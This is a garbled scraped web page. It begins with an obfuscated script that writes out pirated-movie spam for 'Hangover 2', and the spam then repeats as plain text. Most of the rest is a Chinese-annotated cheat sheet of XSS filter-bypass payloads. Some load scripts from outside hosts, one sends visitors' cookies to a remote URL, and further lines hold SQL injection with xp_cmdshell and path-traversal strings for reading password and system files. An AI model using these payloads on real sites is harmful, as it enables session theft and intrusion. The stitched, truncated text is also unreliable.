iph&...

// Obfuscated inline script: its only effect is a single document.write() of a
// string rebuilt from decimal character codes. Decoding the leading codes gives
// <div dir="ltr" style="text-align: left"> ... <b>Download or Watch Full Movie
// Hangover 2 (2011) ..., i.e. the spam block reproduced as plain text after the
// script. String.fromCharCode() encoding keeps literal tags and keywords out of
// the source, so a filter that only looks for "<script", "<div" or "href=" in the
// raw text will not see this content; normalising/decoding before inspection is
// what a content filter or detection rule needs here. The numeric runs broken
// across lines (e.g. "...,10" / "0,105,118,62") appear to be line-wrapping
// artifacts of the extraction rather than part of the original statement, and
// the trailing "|Feed favorited by 1 person." is aggregator chrome fused onto
// the last line.
document.write(String.fromCharCode(60,100,105,118,32,100,105,114,61,34,108,116,114,34,32,115,116,121,108,101,61,34,116,101,120,116,45,97,108,105,103,110,58,32,108,101,102,116,34,62,10,60,100,105,118,32,115,116,121,108,101,61,34,116,101,120,116,45,97,108,105,103,110,58,32,99,101,110,116,101,114,34,62,10,60,115,112,97,110,32,115,116,121,108,101,61,34,102,111,110,116,45,115,105,122,101,58,32,108,97,114,103,101,34,62,60,98,62,68,111,119,110,108,111,97,100,32,111,114,32,87,97,116,99,104,32,70,117,108,108,32,77,111,118,105,101,32,72,97,110,103,111,118,101,114,32,50,32,40,50,48,49,49,41,32,119,105,116,104,32,97,32,104,105,103,104,32,113,117,97,108,105,116,121,32,112,105,99,116,117,114,101,32,97,110,100,32,101,110,106,111,121,32,97,32,108,111,116,32,111,102,32,38,35,56,50,51,48,59,38,35,56,50,51,48,59,38,35,56,50,51,48,59,38,35,56,50,51,48,59,65,108,115,111,32,100,111,119,110,108,111,97,100,32,102,111,114,32,105,80,97,100,32,38,97,109,112,59,32,105,112,104,111,110,101,60,47,98,62,60,47,115,112,97,110,62,60,47,100,105,118,62,10,60,100,105,118,32,115,116,121,108,101,61,34,99,111,108,111,114,58,32,114,101,100,59,116,101,120,116,45,97,108,105,103,110,58,32,99,101,110,116,101,114,34,62,10,60,98,62,60,115,112,97,110,32,115,116,121,108,101,61,34,102,111,110,116,45,115,105,122,101,58,32,120,45,108,97,114,103,101,34,62,72,97,110,103,111,118,101,114,32,50,32,40,50,48,49,49,41,60,47,115,112,97,110,62,60,47,98,62,60,47,100,105,118,62,10,60,100,105,118,32,115,116,121,108,101,61,34,116,101,120,116,45,97,108,105,103,110,58,32,99,101,110,116,101,114,34,62,10,60,47,100,105,118,62,10,60,100,105,118,32,115,116,121,108,101,61,34,116,101,120,116,45,97,108,105,103,110,58,32,99,101,110,116,101,114,34,62,10,60,47,100,105,118,62,10,60,100,105,118,32,115,116,121,108,101,61,34,99,111,108,111,114,58,32,35,51,56,55,54,49,100,59,116,101,120,116,45,97,108,105,103,110,58,32,99,101,110,116,101,114,34,62,10,60,98,62,82,101,108,101,97,115,101,100,32,32,58,32,48,53,47,50,54,47,50,48,49,49,60,47,98,62,60,47,10
0,105,118,62,10,60,100,105,118,32,115,116,121,108,101,61,34,99,111,108,111,114,58,32,35,51,56,55,54,49,100,59,116,101,120,116,45,97,108,105,103,110,58,32,99,101,110,116,101,114,34,62,10,60,98,62,82,117,110,116,105,109,101,32,32,58,32,32,49,48,50,109,105,110,46,60,47,98,62,60,47,100,105,118,62,10,60,100,105,118,32,115,116,121,108,101,61,34,99,111,108,111,114,58,32,35,51,56,55,54,49,100,59,116,101,120,116,45,97,108,105,103,110,58,32,99,101,110,116,101,114,34,62,10,60,98,62,71,101,110,114,101,115,32,32,32,58,32,67,111,109,101,100,121,60,47,98,62,60,47,100,105,118,62,10,60,100,105,118,32,115,116,121,108,101,61,34,99,111,108,111,114,58,32,35,51,56,55,54,49,100,59,116,101,120,116,45,97,108,105,103,110,58,32,99,101,110,116,101,114,34,62,10,60,98,62,68,105,114,101,99,116,111,114,32,58,32,84,111,100,100,32,80,104,105,108,108,105,112,115,60,47,98,62,60,47,100,105,118,62,10,60,100,105,118,32,115,116,121,108,101,61,34,99,111,108,111,114,58,32,35,51,56,55,54,49,100,59,116,101,120,116,45,97,108,105,103,110,58,32,99,101,110,116,101,114,34,62,10,60,98,62,65,99,116,111,114,115,32,32,32,58,32,66,114,97,100,108,101,121,32,67,111,111,112,101,114,44,32,90,97,99,104,32,71,97,108,105,102,105,97,110,97,107,105,115,32,97,110,100,32,69,100,32,72,101,108,109,115,60,47,98,62,60,47,100,105,118,62,10,60,100,105,118,32,115,116,121,108,101,61,34,116,101,120,116,45,97,108,105,103,110,58,32,99,101,110,116,101,114,34,62,10,60,47,100,105,118,62,10,60,100,105,118,32,115,116,121,108,101,61,34,116,101,120,116,45,97,108,105,103,110,58,32,99,101,110,116,101,114,34,62,10,60,47,100,105,118,62,10,60,100,105,118,32,99,108,97,115,115,61,34,115,101,112,97,114,97,116,111,114,34,32,115,116,121,108,101,61,34,99,108,101,97,114,58,32,98,111,116,104,59,116,101,120,116,45,97,108,105,103,110,58,32,99,101,110,116,101,114,34,62,10,60,97,32,116,97,114,103,101,116,61,34,95,98,108,97,110,107,34,32,104,114,101,102,61,34,104,116,116,112,58,47,47,109,111,118,105,101,45,98,111,120,55,46,98,108,111,103,115,112,111,116,46,99,111,1
09,47,50,48,49,49,47,48,53,47,119,97,116,99,104,45,111,114,45,100,111,119,110,108,111,97,100,45,104,97,110,103,111,118,101,114,45,50,45,50,48,49,49,46,104,116,109,108,34,62,60,105,109,103,32,98,111,114,100,101,114,61,34,48,34,32,115,114,99,61,34,104,116,116,112,58,47,47,49,46,98,112,46,98,108,111,103,115,112,111,116,46,99,111,109,47,45,77,122,75,115,114,65,65,65,78,103,77,47,84,101,74,45,50,102,102,108,108,110,73,47,65,65,65,65,65,65,65,65,65,65,52,47,110,99,117,108,52,77,105,73,88,48,65,47,115,49,54,48,48,47,104,97,110,103,111,118,101,114,45,50,43,99,111,112,121,46,106,112,103,34,32,116,105,116,108,101,61,34,68,111,119,110,108,111,97,100,32,72,97,110,103,111,118,101,114,32,50,32,77,111,118,105,101,32,73,110,32,68,105,118,120,47,73,112,111,100,32,81,117,97,108,105,116,121,34,32,97,108,116,61,34,104,97,110,103,111,118,101,114,32,50,43,99,111,112,121,32,68,111,119,110,108,111,97,100,32,72,97,110,103,111,118,101,114,32,50,32,77,111,118,105,101,32,73,110,32,68,105,118,120,47,73,112,111,100,32,81,117,97,108,105,116,121,34,32,47,62,60,47,97,62,60,47,100,105,118,62,10,60,100,105,118,32,115,116,121,108,101,61,34,116,101,120,116,45,97,108,105,103,110,58,32,99,101,110,116,101,114,34,62,10,60,47,100,105,118,62,10,60,100,105,118,32,115,116,121,108,101,61,34,116,101,120,116,45,97,108,105,103,110,58,32,99,101,110,116,101,114,34,62,10,60,47,100,105,118,62,10,60,100,105,118,32,115,116,121,108,101,61,34,116,101,120,116,45,97,108,105,103,110,58,32,99,101,110,116,101,114,34,62,10,84,104,101,114,101,32,97,114,101,32,100,105,102,102,101,114,101,110,116,32,119,97,121,115,32,116,111,32,114,101,101,110,101,114,103,105,122,101,115,32,121,111,117,114,32,115,101,110,115,101,115,32,115,117,99,104,32,97,115,32,115,104,111,112,112,105,110,103,44,32,115,108,101,101,112,105,110,103,44,32,97,110,100,32,110,111,114,109,97,108,32,111,117,116,105,110,103,115,32,98,117,116,32,116,104,101,115,101,32,97,114,101,32,115,111,32,111,98,115,111,108,101,116,101,32,116,111,32,102,105,108,108,32,121,111,117,114,
32,119,101,101,107,101,110,100,115,32,119,105,116,104,32,101,120,99,105,116,101,109,101,110,116,46,32,73,110,32,116,111,100,97,121,97,128,153,115,32,115,99,101,110,97,114,105,111,44,32,112,101,111,112,108,101,32,112,114,101,102,101,114,32,116,111,32,87,97,116,99,104,32,72,97,110,103,111,118,101,114,32,50,32,79,110,108,105,110,101,32,111,102,32,116,104,101,105,114,32,99,104,111,105,99,101,32,116,111,32,109,97,107,101,32,116,104,101,105,114,32,100,97,121,32,115,117,112,101,114,98,46,60,47,100,105,118,62,10,60,100,105,118,32,115,116,121,108,101,61,34,116,101,120,116,45,97,108,105,103,110,58,32,99,101,110,116,101,114,34,62,10,89,111,117,32,107,110,111,119,32,102,114,105,101,110,100,115,59,32,68,111,119,110,108,111,97,100,105,110,103,32,109,111,118,105,101,32,105,115,32,111,110,101,32,111,102,32,116,104,101,32,101,120,99,101,108,108,101,110,116,32,119,97,121,115,44,32,119,104,105,99,104,32,116,114,97,110,115,112,111,114,116,32,117,115,32,116,111,32,97,32,99,111,109,112,108,101,116,101,108,121,32,100,105,102,102,101,114,101,110,116,32,119,111,114,108,100,44,32,119,104,101,114,101,32,121,111,117,32,99,97,110,32,102,117,108,102,105,108,108,32,97,108,108,32,116,104,111,115,101,32,100,101,115,105,114,101,115,44,32,112,101,114,104,97,112,115,44,32,119,104,105,99,104,32,97,114,101,32,104,97,114,100,32,116,111,32,98,101,108,105,101,118,101,32,105,110,32,121,111,117,114,32,114,101,97,108,32,108,105,102,101,46,32,84,104,111,115,101,32,119,104,111,32,114,101,103,117,108,97,114,108,121,32,68,111,119,110,108,111,97,100,32,109,111,118,105,101,32,111,102,32,116,104,101,105,114,32,99,104,111,105,99,101,32,102,114,111,109,32,111,117,114,32,101,120,99,108,117,115,105,118,101,32,99,111,108,108,101,99,116,105,111,110,44,32,97,103,114,101,101,32,116,111,32,116,104,105,115,32,110,111,110,45,100,101,110,121,105,110,103,32,102,97,99,116,32,116,104,97,116,32,105,102,32,116,104,101,121,32,68,111,119,110,108,111,97,100,32,109,111,118,105,101,115,32,116,104,101,110,32,116,104,101,121,32,104,97,118,
101,32,110,111,32,112,108,97,99,101,32,102,111,114,32,112,97,105,110,115,32,97,110,100,32,112,97,116,104,111,115,46,60,47,100,105,118,62,10,60,100,105,118,32,115,116,121,108,101,61,34,116,101,120,116,45,97,108,105,103,110,58,32,99,101,110,116,101,114,34,62,10,73,102,32,121,111,117,32,115,116,97,114,116,32,68,111,119,110,108,111,97,100,105,110,103,32,109,111,118,105,101,115,32,111,110,32,119,101,101,107,101,110,100,115,32,116,104,101,110,32,121,111,117,32,119,105,108,108,32,114,101,97,108,105,122,101,44,32,103,111,110,101,32,97,114,101,32,100,97,121,115,32,119,104,101,110,32,121,111,117,32,117,115,101,100,32,116,111,32,102,105,103,117,114,101,32,111,117,116,32,104,111,119,32,116,111,32,107,105,108,108,32,116,104,101,32,116,105,109,101,32,111,114,32,104,111,119,32,116,111,32,109,97,107,101,32,121,111,117,114,32,100,97,121,32,98,101,97,117,116,105,102,117,108,46,32,73,110,32,102,97,99,116,32,116,104,105,115,32,105,115,32,97,110,32,105,110,116,101,114,101,115,116,105,110,103,32,109,111,100,101,32,116,111,32,114,101,102,114,101,115,104,32,97,110,100,32,114,101,108,97,120,46,32,68,111,119,110,108,111,97,100,32,72,97,110,103,111,118,101,114,32,50,32,102,114,111,109,32,111,117,114,32,115,112,101,99,105,97,108,32,99,111,108,108,101,99,116,105,111,110,32,97,110,100,32,103,101,116,32,114,101,97,100,121,32,116,111,32,101,120,112,108,111,114,101,32,116,104,101,32,119,111,114,108,100,32,111,102,32,99,111,109,112,108,101,116,101,32,101,110,116,101,114,116,97,105,110,109,101,110,116,46,60,47,100,105,118,62,10,60,100,105,118,32,115,116,121,108,101,61,34,116,101,120,116,45,97,108,105,103,110,58,32,99,101,110,116,101,114,34,62,10,87,101,32,104,97,118,101,32,101,120,99,108,117,115,105,118,101,32,112,108,101,116,104,111,114,97,32,111,102,32,109,111,118,105,101,115,32,119,104,105,99,104,32,105,115,32,115,117,102,102,105,99,105,101,110,116,32,101,110,111,117,103,104,32,116,111,32,102,117,108,102,105,108,108,32,121,111,117,114,32,114,101,113,117,101,115,116,32,97,110,100,32,100,101,109,97,
110,100,115,46,32,65,108,108,32,121,111,117,32,110,101,101,100,32,116,111,32,112,101,114,117,115,101,32,116,104,114,111,117,103,104,32,111,117,114,32,119,101,98,115,105,116,101,32,116,111,32,103,101,116,32,97,108,108,32,115,111,114,116,115,32,111,102,32,109,111,118,105,101,115,46,32,87,104,97,116,97,128,153,115,32,109,111,114,101,44,32,121,111,117,32,99,97,110,32,103,101,116,32,116,111,32,107,110,111,119,32,109,111,114,101,32,97,98,111,117,116,32,121,111,117,114,32,102,97,118,111,114,105,116,101,32,99,101,108,101,98,115,32,97,110,100,32,116,104,101,105,114,32,108,97,116,101,115,116,32,116,105,116,108,101,32,116,97,116,116,108,101,115,46,32,70,117,114,116,104,101,114,109,111,114,101,44,32,119,101,32,117,112,100,97,116,101,32,121,111,117,32,97,98,111,117,116,32,115,101,99,114,101,116,32,97,110,100,32,98,101,104,105,110,100,32,116,104,101,32,115,99,101,110,101,32,103,111,115,115,105,112,115,32,119,104,105,99,104,32,121,111,117,32,109,105,103,104,116,32,110,111,116,32,103,101,116,32,97,110,121,119,104,101,114,101,32,101,108,115,101,46,32,73,102,32,121,111,117,32,99,108,111,115,101,108,121,32,112,97,121,32,97,116,116,101,110,116,105,111,110,32,116,111,32,111,117,114,32,108,105,115,116,32,111,102,32,119,101,98,115,105,116,101,44,32,102,114,111,109,32,119,104,101,114,101,32,121,111,117,32,68,111,119,110,108,111,97,100,32,109,111,118,105,101,115,44,32,116,104,101,110,32,121,111,117,32,119,105,108,108,32,110,111,116,105,99,101,32,116,104,97,116,32,119,101,32,97,114,101,32,110,111,116,32,114,101,115,116,114,105,99,116,101,100,32,116,111,32,72,111,108,108,121,119,111,111,100,32,109,111,118,105,101,115,59,32,105,110,32,102,97,99,116,32,119,101,32,104,97,118,101,32,103,111,110,101,32,98,101,121,111,110,100,32,97,110,100,32,99,111,118,101,114,101,100,32,111,116,104,101,114,32,102,105,108,109,32,105,110,100,117,115,116,114,105,101,115,32,97,115,32,119,101,108,108,46,60,47,100,105,118,62,10,60,100,105,118,32,115,116,121,108,101,61,34,116,101,120,116,45,97,108,105,103,110,58,32,99,1
01,110,116,101,114,34,62,10,73,102,32,121,111,117,32,119,97,110,116,32,116,111,32,102,105,108,108,32,121,111,117,114,32,108,105,102,101,32,119,105,116,104,32,97,108,108,32,116,104,101,32,101,109,111,116,105,111,110,115,32,97,110,100,32,121,111,117,32,104,97,118,101,32,97,32,100,101,115,105,114,101,32,116,111,32,108,105,118,101,32,97,108,108,32,121,111,117,114,32,100,114,101,97,109,115,32,116,104,101,110,32,68,111,119,110,108,111,97,100,105,110,103,32,109,111,118,105,101,115,32,105,115,32,97,110,32,101,120,99,101,108,108,101,110,116,32,97,108,116,101,114,110,97,116,105,118,101,46,32,71,111,110,101,32,97,114,101,32,100,97,121,115,32,119,104,101,110,32,112,101,111,112,108,101,32,117,115,101,100,32,116,111,32,100,111,32,115,104,111,112,112,105,110,103,32,97,110,100,32,111,117,116,105,110,103,32,116,111,32,109,97,107,101,32,116,104,101,105,114,32,119,101,101,107,101,110,100,115,32,119,111,110,100,101,114,102,117,108,46,32,78,111,119,32,105,116,97,128,153,115,32,116,105,109,101,32,102,111,114,32,115,111,109,101,116,104,105,110,103,32,110,101,119,32,97,110,100,32,105,110,116,101,114,101,115,116,105,110,103,59,32,115,111,32,87,97,116,99,104,32,72,97,110,103,111,118,101,114,32,50,32,111,110,108,105,110,101,32,116,111,32,101,110,101,114,103,105,101,115,32,121,111,117,114,32,100,117,108,108,32,97,110,100,32,98,111,114,105,110,103,32,119,101,101,107,101,110,100,115,46,72,97,110,103,111,118,101,114,32,50,44,87,97,116,99,104,32,72,97,110,103,111,118,101,114,32,50,44,32,68,111,119,110,108,111,97,100,32,72,97,110,103,111,118,101,114,32,50,44,32,87,97,116,99,104,32,72,97,110,103,111,118,101,114,32,50,32,111,110,108,105,110,101,44,72,97,110,103,111,118,101,114,32,50,32,102,111,114,32,105,80,104,111,110,101,44,72,97,110,103,111,118,101,114,32,50,32,102,111,114,32,105,80,97,100,60,47,100,105,118,62,10,60,100,105,118,32,115,116,121,108,101,61,34,116,101,120,116,45,97,108,105,103,110,58,32,99,101,110,116,101,114,34,62,10,60,47,100,105,118,62,10,60,100,105,118,32,115,116,121,108,101,61,34
,116,101,120,116,45,97,108,105,103,110,58,32,99,101,110,116,101,114,34,62,10,60,47,100,105,118,62,10,60,100,105,118,32,115,116,121,108,101,61,34,116,101,120,116,45,97,108,105,103,110,58,32,99,101,110,116,101,114,34,62,10,60,47,100,105,118,62,10,60,100,105,118,32,115,116,121,108,101,61,34,116,101,120,116,45,97,108,105,103,110,58,32,99,101,110,116,101,114,34,62,10,60,112,62,72,97,110,103,111,118,101,114,32,50,44,87,97,116,99,104,32,72,97,110,103,111,118,101,114,32,50,44,32,68,111,119,110,108,111,97,100,32,72,97,110,103,111,118,101,114,32,50,44,32,87,97,116,99,104,32,72,97,110,103,111,118,101,114,32,50,32,111,110,108,105,110,101,44,72,97,110,103,111,118,101,114,32,50,32,102,111,114,32,105,80,104,111,110,101,44,72,97,110,103,111,118,101,114,32,50,32,102,111,114,32,105,80,97,100,60,98,114,32,47,62,10,87,97,116,99,104,32,111,114,32,68,111,119,110,108,111,97,100,32,72,97,110,103,111,118,101,114,32,50,32,40,50,48,49,49,41,60,47,112,62,60,47,100,105,118,62,10,60,47,100,105,118,62));|Feed favorited by 1 person.
Download or Watch Full Movie Hangover 2 (2011) with a high quality picture and enjoy a lot of …………Also download for iPad & iphone
Hangover 2 (2011)
: 05/26/2011
Director : Todd Phillips
: Bradley Cooper, Zach Galifianakis and Ed Helms
There are different ways to reenergizes your senses such as shopping, sleeping, and normal outings but these are so obsolete to fill your weekends with excitement. In today’s scenario, people prefer to Watch Hangover 2 Online of their choice to make their day superb.
Y Downloading movie is one of the excellent ways, which transport us to a completely different world, where you can fulfill all those desires, perhaps, which are hard to believe in your real life. Those who regularly Download movie of their choice from our exclusive collection, agree to this non-denying fact that if they Download movies then they have no place for pains and pathos.
If you start Downloading movies on weekends then you will realize, gone are days when you used to figure out how to kill the time or how to make your day beautiful. In fact this is an interesting mode to refresh and relax. Download Hangover 2 from our special collection and get ready to explore the world of complete entertainment.
We have exclusive plethora of movies which is sufficient enough to fulfill your request and demands. All you need to peruse through our website to get all sorts of movies. What’s more, you can get to know more about your favorite celebs and their latest title tattles. Furthermore, we update you about secret and behind the scene gossips which you might not get anywhere else. If you closely pay attention to our list of website, from where you Download movies, then you will notice that we are not restricted to H in fact we have gone beyond and covered other film industries as well.
If you want to fill your life with all the emotions and you have a desire to live all your dreams then Downloading movies is an excellent alternative. Gone are days when people used to do shopping and outing to make their weekends wonderful. Now it’s time for something so Watch Hangover 2 online to energies your dull and boring weekends.Hangover 2,Watch Hangover 2, Download Hangover 2, Watch Hangover 2 online,Hangover 2 for iPhone,Hangover 2 for iPad
Hangover 2,Watch Hangover 2, Download Hangover 2, Watch Hangover 2 online,Hangover 2 for iPhone,Hangover 2 for iPad
Watch or Download Hangover 2 (2011)
[1] http://movie-/2011/05/watch-or-download-hangover-2-2011.html
"&&img src="" onerror="document.write(String.fromCharCode(60)+String.fromCharCode(115)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(62)+String.fromCharCode(97)+String.fromCharCode(108)+String.fromCharCode(101)+String.fromCharCode(114)+String.fromCharCode(116)+String.fromCharCode(40)+String.fromCharCode(49)+String.fromCharCode(41)+String.fromCharCode(60)+String.fromCharCode(47)+String.fromCharCode(115)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(62))"& &在网页过滤了&script和单引号的情况下可以使用代码绕过,上面write中内容输出的结果是&script&alert(1)&/script& & 如果想缩短,可以把上面的参数合并,像这样:String.fromCharCode(76,90,83,66);"&&meta http-equiv="Refresh" content="0;url=javascript:document.write(String.fromCharCode(60)+String.fromCharCode(115)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(32)+String.fromCharCode(115)+String.fromCharCode(114)+String.fromCharCode(99)+String.fromCharCode(61)+String.fromCharCode(120)+String.fromCharCode(120)+String.fromCharCode(120)+String.fromCharCode(62)+String.fromCharCode(60)+String.fromCharCode(47)+String.fromCharCode(115)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(62))& 遇到过滤&script&无法调用js的时候也可以用类似的代码突破,上面代码是跳转url到javascript:document.write("&script src=xxx&&/script&") 也就是调用js文件xxx 如果想缩短,可以把上面的参数合并,像这样:String.fromCharCode(76,90,83,66);"&&iframe src=javascript:alert(document.cookie); height=0 width=0 /& &&iframe&弹窗&iframe src=javascript:with(document)0[body.appendChild(document.createElement('script')).src="/1.js"]&&/iframe& iframe收信&&img src=x onerror=appendChild(createElement('script')).src='//js地址' /& 
img标签来收信&img/**/src=1/**/onerror="with(document)body.appendChild(createElement('script')).src='脚本地址'" /& & 过滤了 &script&标签 以及空格 的解决办法&img src="5" onerror=eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")&&/img& &回显是&img src="5" onerror=eval("alert('xss')")&&/img& &&如果你要加载脚本请这样:javascript:document.write(unescape(' &script src="脚本地址"&&/script&')); 修改好后 进行HEX加密再放入eval&注:第一段代码:首先将要执行的 利用Hex 编码 再img 的错误事件 用eval 函数 操控()内的代码!eval 可以计算 并执行 将上面代码解码后便执行了!&第二段加载脚本的:首先是利用 javascript unescape函数 对()内的HEX编码进行解码 然后再通过document.write 在文档对象上面输入()内的内容!&因为()内的内容以及经过unescape的解码 所以输出来后是正常的 如果没有进行解码 那么你输出来的 将会是hex&在这里没有出现 script等危险标签 也没有单引号 所以成功绕过! & &过滤了单引号 以及几个危险标签&script&document.write(String.fromCharCode(在这里写上你的代码));&/script& & 过滤了等号 单引号 双引号 空格的绕过方法&img src=1 onerror=javascript:alert("\x58S\x53\40\x41t\x74\x61\x63\153e\162")& &该过滤的都过滤了&img src=x onerror=alert(/insight-labs/)&、&p onmouseover=alert(/insight-labs/)&insight-labs、&frameset onload=alert(/insight-labs/)&、&body onload=alert(/insight-labs/)& & 事件函数 来弹窗屏蔽了scaript可以把scaript改成sc%0aript来绕过"h"+"t"+"t"+"p",绕过对http的过滤'"&&script&alert(/1/)&/script&&a="'"&&script src=http://x.co/xiHv&&/script&&a="='&&script&alert(document.cookie)&/script&&script&alert(document.cookie)&/script&&script&alert(vulnerable)&/script&%3Cscript%3Ealert('XSS')%3C/script%3E'"&&script src="//x.co/xiHv"&&/script&&a="'"&&script src=//xss.tw/2045&&/script&&a="'"&&script src=//xss.tw/3058&&/script&&a="&&script&src=//xss.tw/3058&&/script&& &引号& &空格& & &&& & &&无src 无等号 &无引号"&&/span&&script&document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,120,46,99,111,47,120,105,72,118,62,60,47,115,99,114,105,112,116,62));&/script&&span&eval(Dec('203','2549'));&div style="display:none"&&/div&&div style="display:none" &t="1" &e="style\/&'&&&/div&&/ \&&/&img src=# onerror=eval(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,47,47,120,115,115,46,116,119,47,51,48,53,56,62,60,47,115,99,114,105,112,116,62,32));/\>&&div 
id="myxsxxcd" style="color:display:none" title="if(!window.myxsssxx){window.myxsssxx=123;alert(document.cookie);}"&&DIV&&A&&/A&&STYLE&&!--a{& img src=&/STYLE&;x:expression(eval(myxsxxcd.title));&style&}--&&/style&&/DIV&&td width="628" background="/img/index2_r7_c2_r1_c5_s1_s1.jpg"&&img src=x onerror=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,115,99,114,105,112,116,34,41,41,46,115,114,99,61,34,104,116,116,112,58,47,47,120,115,115,46,116,119,47,51,51,56,49,34))&&&img src=x onerror=eval(String.fromCharCode(document.body.appendChild(createElement("script")).src="http://xss.tw/3381"))&&img src=x onerror=document.body.appendChild(createElement('script')).src="javascript:alert(/1/)"&&&img src=x onerror=document.body.appendChild(createElement('script')).src='http://xss8.net/? c=QihaL'&&p&&img class="reference" contenteditable="false" data-refid="2" data-type="reference" onerror="eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,115,99,114,105,112,116,34,41,41,46,115,114,99,61,34,104,116,116,112,58,47,47,120,115,115,56,46,110,101,116,47,63,99,61,81,105,104,97,76,34))" src="/img/baike/editor/reference.gif" unselectable="on" /&&/p&eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,115,99,114,105,112,116,34,41,41,46,115,114,99,61,34,104,116,116,112,58,47,47,120,115,115,56,46,110,101,116,47,63,99,61,81,105,104,97,76,34))&div class="qm_left" style="position:z-index:2;background:url(//xss.tw/2180) no-repeat 0 0;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='//xss.tw/2180',sizingMethod='scale');width:40height:40"&&span class="qm_ico_print" id="mail_print" title="打印" 
onclick="window.open('/cgi-bin/readmail?sid=SC_hEOi3h_nqEgJQ&');"&&/span&ECMAScript v3 已从标准中删除了 unescape() 函数,并反对使用它因此应该用 decodeURI() 和 decodeURIComponent() 取而代之。通过找到形式为 %xx 和 %uxxxx 的字符序列(x 表示十六进制的数字)用 Unicode 字符 \u00xx 和 \uxxxx 替换这样的字符序列进行解码。解密是unescape('%udcdb%uced3%u8d93%u888a%ud58f%u');加密是escape('%udcdb%uced3%u8d93%u888a%ud58f%ud4c8%udcd9%ud ');&javascript:document.write(unescape('&script src="/x.js"&&/script&'));document.write(String.fromCharCode(60,12,62)); &==== &document.write(String.fromCharCode(&script src=http://xss.me/1&&/script&));&"&&/span&&script&document.write()&/script&&span&[email][url][img] onmouseover=eval(String.fromCharCode(116,114)); [/img][/url][/email]鼠标单击&a href="" style="color:#143d70;" onclick="alert(/a/);this.style.behavior='url(#default#homepage)';this.setHomePage(''); return(false);"&asdasdsad&/a&&table background=”javascript:alert(/xss/)”&&/table&’/在表格中插入脚本&&过滤用\x3cscript. src= /malicious-code.js\x3e\x3c/script\x3e&&script defer="defer"&var a,b;a="/";b="/x.co/xiHv";window.open(a+b,"","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,width=500,height=500");&/script&&% string str_a = rrequest.getParameter("a");%&&var a= &%=str_a%&document.write(a);&img src="123"&a.jsp/&script&alert('Vulnerable')&/script&a/a?&script&alert('Vulnerable')&/script&"&&script>alert('xss')</script&';exec%20master..xp_cmdshell%20'dir%20 c:%20&%20c:\inetpub\wwwroot\?.txt'--&&%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cscript%3Ealert(document. 
domain);%3C/script%3E&%3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID=1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=../../../../../../../../etc/passwd..\..\..\..\..\..\..\..\windows\system.ini\..\..\..\..\..\..\..\..\windows\system.ini'';!--"&XSS&=&{()}&IMG src="javascript:alert('XSS');"&&IMG src=javascript:alert('XSS')&&IMG src=JaVaScRiPt:alert('XSS')&&IMG src=JaVaScRiPt:alert("XSS")&&IMG src=javascript:alert('XSS')&&IMG src=javascript:alert('XSS')&&IMG src=javascript:alert('XSS')&&&sRCIpt&alert(/123/)&/ScRpT&&P&&SPAN class=xmsw title=防火外墙保温材料 onmouseout="window.location=''"&了解你的产品和行&/SPAN&&/P&&div style="background-image:url(&script&alert(document.cookie)&/script&)"&&div style="background-image:url(javascript:alert(document.cookie))"&&div style="behaviour:url('http://www.how-to-hack.org/exploit.html');"&&div style="width:expression(alert('x123ss'));"&&img src="java&#script:alert(/1231/);"&&img src=javascript:alert(/1231/);&&img src="javascript:alert('XSS')"&&IMG src="jav ascript:alert('XaSS');"&&IMG src="jav ascript:alert('XbSS');"&&IMG src="jav ascript:alert('XcSS');"&"&IMG src=java\0script:alert(\"XSS\")&";' & out&IMG src=" javascript:alert('XdSS');"&&SCRIPT&a=/XSfS/alert(a.source)&/SCRIPT&&BODY BACKGROUND="javascript:alert('XeSS')"&&BODY ONLOAD=alert('XgSS')&&IMG DYNSRC="javascript:alert('XhSS')"&&IMG LOWSRC="javascript:alert('XiSS')"&&BGSOUND src="javascript:alert('XjSS');"&&span onclick="javascript:changeFont(2);"&&SPAN class=xmsw title=dd onmouseout=window.location=''&test&/span&&span class="xmsw" title="dd" onmouseout=window.location='http://test/test.php?c='+document.cookie&test&/span&&SPAN class=xmsw title=dd onmouseout=javascript:alert(document.cookie)&test&/SPAN&&br size="&{alert('XkSS')}"&&LAYER src="http://xss.ha.ckers.org/a.js"&&/layer&&LINK REL="stylesheet" href="javascript:alert('XlSS');"&&IMG src='vbscript:msgbox("XmSS")'&&IMG src="mocha:[code]"&&IMG src="livescript:[code]"&&META 
